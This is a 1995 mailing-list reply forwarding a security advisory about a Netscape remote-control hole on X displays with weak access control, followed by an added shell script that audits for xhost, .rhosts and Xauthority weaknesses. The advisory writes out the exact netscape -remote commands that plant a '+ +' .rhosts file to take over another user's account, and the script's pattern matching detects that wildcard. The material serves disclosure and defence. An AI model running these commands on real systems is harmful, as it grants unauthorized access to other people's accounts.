From: sameer <sameer@c2.org>
To: jk@digit.ee (Jyri Kaljundi)
Message Hash: 18b28ecf21807bd8fcf4f2cc7858cf5c8fce0980b9d90b7a6506ae2d30fafcfc
Message ID: <199509291644.JAA07516@infinity.c2.org>
Reply To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
UTC Datetime: 1995-09-29 16:55:35 UTC
Raw Date: Fri, 29 Sep 95 09:55:35 PDT
Subject: Re: Netscape hole without .Xauthority (fwd)
That's called an X hole, not a netscape hole.
>
>
> Haven't seen this on the cypherpunks yet, sorry if this has been here
> already.
>
> Juri
>
> <o Jüri Kaljundi e-mail: jk@digit.ee o<
> >o tel: +372 6308994 o>
> <o DigiTurg http://www.digit.ee/ o<
>
> ---------- Forwarded message ----------
>
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.
> Potential impact: anybody can become any user that uses Netscape on any
> system without sufficient X security.
>
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps:
>
> - make a text file containing only "+ +" accessible (as file, as URL, or
> whatever you like) to the target Netscape client. This is quite easy, either
> if you have a personal WWW page (http://... URL) or an account on the
> target machine (file://... URL), or even by uploading it to an anon FTP
>
> - set your DISPLAY environment variable to the target display
>
> - run the following set of commands:
>
> netscape -noraise -remote "openURL(<put-your-URL-here>)"
> netscape -noraise -remote "saveAs(.rhosts)"
> netscape -noraise -remote back
>
> In the second command, the path should be specified whenever possible
> (~ is not accepted).
>
> If the target user does not already have a .rhosts and is not looking at that
> precise moment, then the chances are it worked !
>
> Solution to the problem: every user concerned should either create an
> Xauthority file, or stop using Netscape.
>
> MXK
>
>
> PS: WHY do they bother with PGP and RSA security when they keep such holes ????
>
> +------------------------------------+---------------------------------+
> | Denis AUROUX (MXK) | Ecole Normale Superieure |
> | 255 rue Saint-Jacques | 45 rue d'Ulm |
> | 75005 PARIS FRANCE | 75005 PARIS |
> | email: auroux@clipper.ens.fr | FRANCE |
> +------------------------------------+---------------------------------+
> | This .sig is SHAREWARE. If you use it often, please send me $50. |
> | After registering you will receive a fully functional .sig and all |
> | updates for free. |
> +----------------------------------------------------------------------+
>
--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer@c2.org
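The forwarded message relies on three things an auditor can check for: an X display whose host-based access control has been disabled with xhost, a missing (or world-readable) Xauthority file, and a .rhosts that has ended up containing a wildcard "+ +" entry. The script below is an added example, not code from either poster; it wraps each check in a function that takes its input as an argument so the logic can be exercised on constructed data, and only touches the live system when invoked with "--live". The two xhost status strings are the ones the X11 xhost utility prints; the file paths, function names and the "--live" flag are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): audit for the conditions the
# forwarded "netscape -remote" attack depends on.

# 1. Is host-based access control disabled on the display?
#    $1 is the text printed by `xhost`. A real xhost prints either
#    "access control enabled, only authorized clients can connect" or
#    "access control disabled, clients can connect from any host".
xhost_is_open() {
    case "$1" in
        *"access control disabled"*) return 0 ;;   # anyone may connect
        *) return 1 ;;
    esac
}

# 2. Does a .rhosts file trust every host?
#    $1 is the path to the file. Matches a host field of "+" (any host),
#    with or without a user field, so "+", "+ +" and "+ someuser" all hit.
#    "+@netgroup" is netgroup syntax and deliberately does not match.
rhosts_has_wildcard() {
    [ -f "$1" ] || return 1
    grep -Eq '^[[:space:]]*\+([[:space:]]+[^[:space:]]+)?[[:space:]]*$' "$1"
}

# 3. Is there a non-empty Xauthority file readable only by its owner?
#    $1 is the path (normally $XAUTHORITY or ~/.Xauthority).
xauth_ok() {
    [ -s "$1" ] || return 1
    # GNU stat first, BSD/macOS stat as fallback
    perms=$(stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1")
    [ "$perms" = "600" ]
}

# Run the three checks against the current session and print warnings.
# Assumed paths: $HOME/.rhosts and ${XAUTHORITY:-$HOME/.Xauthority}.
audit_live() {
    if command -v xhost >/dev/null 2>&1 && [ -n "${DISPLAY:-}" ]; then
        if xhost_is_open "$(xhost 2>/dev/null)"; then
            echo "WARNING: xhost access control is disabled on display $DISPLAY"
        fi
    fi
    if rhosts_has_wildcard "$HOME/.rhosts"; then
        echo "WARNING: $HOME/.rhosts trusts every remote host"
    fi
    xa="${XAUTHORITY:-$HOME/.Xauthority}"
    if ! xauth_ok "$xa"; then
        echo "WARNING: no mode-600 Xauthority file at $xa"
    fi
}

# Only touch the live system when explicitly asked.
[ "${1:-}" = "--live" ] && audit_live
```

Run it as `sh audit_x.sh --live` on the target account; with no argument it just defines the functions, which is what lets the checks be tested on fabricated xhost output and temporary .rhosts/.Xauthority files. Note that the xhost check only covers the host-list mechanism; a display protected by MIT-MAGIC-COOKIE-1 still reports "access control enabled", so the Xauthority check is the one that matters for the cookie-based fix the message recommends.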